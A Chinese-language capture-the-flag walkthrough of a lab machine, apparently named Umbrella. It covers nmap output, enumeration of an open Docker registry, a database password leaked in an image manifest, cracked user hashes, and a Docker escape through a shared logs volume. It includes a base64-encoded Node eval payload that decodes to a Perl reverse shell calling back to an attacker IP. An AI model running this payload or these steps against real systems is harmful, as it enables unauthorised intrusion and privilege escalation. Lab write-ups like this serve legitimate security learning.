Starting Nmap 7.60 ( https://nmap.org ) at 2024-02-08 13:08 GMT
Nmap scan report for ip-10-10-190-94.eu-west-1.compute.internal (10.10.190.94)
Host is up (0.0010s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
3306/tcp open  mysql   MySQL 5.7.40
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.40
|   Thread ID: 3
|   Capabilities flags: 65535
|   Some Capabilities: LongColumnFlag, Speaks41ProtocolOld, FoundRows, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, InteractiveClient, LongPassword, SupportsTransactions, IgnoreSigpipes, ConnectWithDatabase, SupportsCompression, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, ODBCClient, SwitchToSSLAfterHandshake, Support41Auth, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
|   Status: Autocommit
|   Salt: 	ZnA%+[cWq,1.\x108\x19&Fk\x05
|_  Auth Plugin Name: 79
5000/tcp open  http    Docker Registry (API: 2.0)
|_http-title: Site doesn't have a title.
8080/tcp open  http    Node.js (Express middleware)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Login
MAC Address: 02:D7:B1:19:0F:4F (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.01 seconds

docker 5000端口上的api协议,可以去hacktricks看看
然后curl一下
curl -s http://10.10.190.94:5000/v2/_catalog

Pasted%20image%2020240208211111

curl -s http://10.10.190.94:5000/v2/umbrella/timetracking/tags/list
拉标签
Pasted%20image%2020240208211205

curl -s http://10.10.190.94:5000/v2/umbrella/timetracking/manifests/latest

获取具体信息

{
         "v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"ExposedPorts\":{\"8080/tcp\":{}},\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"NODE_VERSION=19.3.0\",\"YARN_VERSION=1.22.19\",\"DB_HOST=db\",\"DB_USER=root\",\"DB_PASS=Ng1-f3!Pe7-e5?Nf3xe5\",\"DB_DATABASE=timetracking\",\"LOG_FILE=/logs/tt.log\"],\"Cmd\":[\"node\",\"app.js\"],\"Image\":\"sha256:039f3deb094d2931ed42571037e473a5e2daa6fd1192aa1be80298ed61b110f1\",\"Volumes\":null,\"WorkingDir\":\"/usr/src/app\",\"Entrypoint\":[\"docker-entrypoint.sh\"],\"OnBuild\":null,\"Labels\":null},\"container\":\"527e55a70a337461e3615c779b0ad035e0860201e4745821c5f3bc4dcd7e6ef9\",\"container_config\":{\"Hostname\":\"527e55a70a33\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"ExposedPorts\":{\"8080/tcp\":{}},\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"NODE_VERSION=19.3.0\",\"YARN_VERSION=1.22.19\",\"DB_HOST=db\",\"DB_USER=root\",\"DB_PASS=Ng1-f3!Pe7-e5?Nf3xe5\",\"DB_DATABASE=timetracking\",\"LOG_FILE=/logs/tt.log\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) \",\"CMD [\\\"node\\\" \\\"app.js\\\"]\"],\"Image\":\"sha256:039f3deb094d2931ed42571037e473a5e2daa6fd1192aa1be80298ed61b110f1\",\"Volumes\":null,\"WorkingDir\":\"/usr/src/app\",\"Entrypoint\":[\"docker-entrypoint.sh\"],\"OnBuild\":null,\"Labels\":{}},\"created\":\"2022-12-22T10:03:08.042002316Z\",\"docker_version\":\"20.10.17\",\"id\":\"7aec279d6e756678a51a8f075db1f0a053546364bcf5455f482870cef3b924b4\",\"os\":\"linux\",\"parent\":\"47c36cf308f072d4b86c63dbd2933d1a49bf7adb87b0e43579d9c7f5e6830ab8\",\"throwaway\":true}"

cf可以找到
mysql -h 10.10.190.94 -u root -p远程链接,接下来可能是UDF提权了

Pasted%20image%2020240208213846

最终还是选择了无限试用:)

claire-r:2ac9cb7dc02b3c0083eb70898e549b63:Password1
chris-r:0d107d09f5bbe40cade3de5c71e9e9b7:letmein
jill-v:4a04890400b5d7bac101baace5d7e994:sandwich
barry-b:d5c0607301ad5d5c1528962a83992ac8:sunshine1

hashes锁了

网页登不上,试试ssh

…还是上不去,试试这个工具,重新搜集docker信息

python ../drg.py http://10.10.190.94 --list
python ../drg.py http://10.10.190.94 --dump umbrella/timetracking`
去下载好的里面
for i in *.tar.gz; do tar -xzvf $i; done #等会记得删除

草啊啊啊啊啊啊

claire-r@ctf:~$ whoami
claire-r
claire-r@ctf:~$

输错了,你吗的

到这里猜测

version: '3.3'
services:
  db:
    image: mysql:5.7
    restart: always
    environment:
      MYSQL_DATABASE: 'timetracking'
      MYSQL_ROOT_PASSWORD: 'Ng1-f3!Pe7-e5?Nf3xe5'
    ports:
      - '3306:3306'     
    volumes:
      - ./db:/docker-entrypoint-initdb.d
  app:
    image: umbrella/timetracking:latest
    restart: always
    ports:
      - '8080:8080'
    volumes:
      - ./logs:/logs

利用远程api进行cp或其他命令到log里进行提权
Pasted%20image%2020240208222214

额,eval显然

require('child_process').exec('echo cGVybCAtZSAndXNlIFNvY2tldDskaT0iMTAuMTcuNi4xNzMiOyRwPTk5OTk7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygic2ggLWkiKTt9Oyc= | base64 -d | bash')

麻了
base里用的perl

perl -e 'use Socket;$i="10.17.6.173";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'

接下来docker逃逸
刚才看到挂在了logs
Pasted%20image%2020240208223914

第一次链接的是本机,node是docker 里跑的
Pasted%20image%2020240208224153

共享状态?
然后chown,chmod +s
直接提权了
Pasted%20image%2020240208224526

🐮